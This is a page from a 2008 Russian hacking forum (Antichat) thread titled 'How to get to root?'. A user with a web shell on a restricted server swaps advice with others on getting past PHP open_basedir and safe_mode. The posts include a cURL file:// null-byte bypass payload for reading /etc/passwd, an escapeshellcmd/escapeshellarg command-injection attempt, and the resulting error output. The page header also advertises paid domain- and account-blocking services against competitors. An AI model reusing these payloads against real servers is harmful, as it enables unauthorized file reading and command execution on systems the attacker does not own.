Как пробиться к корню?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Как пробиться к корню?

Страница 4 из 4

Опции темы

Поиск в этой теме

Опции просмотра

#31

04.10.2008, 19:58

1west

Познающий

Регистрация: 08.02.2007

Сообщений: 30

С нами: 10134157

Репутация: 3

Цитата:

Сообщение от [Raz0r]

доступ к /tmp делают для того, чтобы php мог записывать сессии. Кстати доступ открыт не только для /tmp и папки веб, но и usr/lib/php (для доступа к PEAR и другим общим скриптам)

версия php какая? возможно для твоей версии есть способ обхода ограничений
google.com/?q=open_basedir+bypass

в /usr/lib/php я зайти не могу.
пишет незя а в ошибке показывает что можно.
PHP Version 5.2.5-pl1-gentoo
Apache 2.0 Handler

#32

04.10.2008, 20:02

1west

Познающий

Регистрация: 08.02.2007

Сообщений: 30

С нами: 10134157

Репутация: 3

Цитата:

Сообщение от $n@ke

/etc/passwd
и т.п можешь попробовать прочесть с шелла "* ernealizm *" через file id.

правь сорцы для своих нужд.

где ево взять.
есть сылка?

#33

05.10.2008, 00:59

1west

Познающий

Регистрация: 08.02.2007

Сообщений: 30

С нами: 10134157

Репутация: 3

вот нашел
http://groups.google.pl/group/mailing.unix.bugtraq/browse_thread/thread/fad2925061ad312d
PHP 5.2.5 cURL safe_mode bypass
The first issue [SAFE_MODE bypass]
var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__)));
the last step in curl_init() function will only copy file://safe_mode_bypass to urlcopy.
The main problem exists in php_url_parse_ex() function. If you put in curl_init() "file://host/somewhere/path.php", php_url_parse_ex() will select /somewhere/path.php to path varible. Looks good but it cannot be used, when you will check real path. Using file:///etc/passwd is correct but between file:// and /etc/passwd, php_url_parse_ex() will select host and return path to /passwd.

как норм запрос составить
делаю var_dump(curl_exec(curl_init("file://etc/passwd")));
белая страница с надписью bool(false)
как я понел файл должен скопироваться?

#34

05.10.2008, 01:04

mister

Познающий

Регистрация: 24.07.2007

Сообщений: 31

С нами: 9895235

Репутация: 35

var_dump(curl_exec(curl_init("file://etc/passwd\x00".__FILE__)));

#35

05.10.2008, 01:12

1west

Познающий

Регистрация: 08.02.2007

Сообщений: 30

С нами: 10134157

Репутация: 3

если так
var_dump(curl_exec(curl_init("file:///etc/passwd")));
ответ
Warning: curl_init() [function.curl-init]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/ru:/usr/lib/php:/tmp) in /var/www/ru/1.php on line 2
Warning: curl_exec(): supplied argument is not a valid cURL handle resource in /var/www/ru/1.php on line 2
bool(false)

#36

05.10.2008, 01:18

1west

Познающий

Регистрация: 08.02.2007

Сообщений: 30

С нами: 10134157

Репутация: 3

Цитата:

Сообщение от mister

var_dump(curl_exec(curl_init("file://etc/passwd\x00".__FILE__)));

все что выводит
bool(false)
может заплатка какая стоит?

#37

05.10.2008, 13:45

1west

Познающий

Регистрация: 08.02.2007

Сообщений: 30

С нами: 10134157

Репутация: 3

вот по свежее выполнение команд
http://securityvulns.ru/Tdocument809.html
[1] escapeshellcmd()
escapeshellcmd("echo ".chr(0xc0).";id");

[2] escapeshellarg()
$arg1 = chr(0xc0);
$arg2 = "; id ; #";
$cmd = "echo ".escapeshellarg($arg1)." ".escapeshellarg($arg2);

после этого белая страница.
вывода команды нету.
ошибок тоже.

Страница 4 из 4

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Как стать Хакером? (или как всё начиналось у вас?)	RaZ_69	Болталка	46	22.02.2006 08:33

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход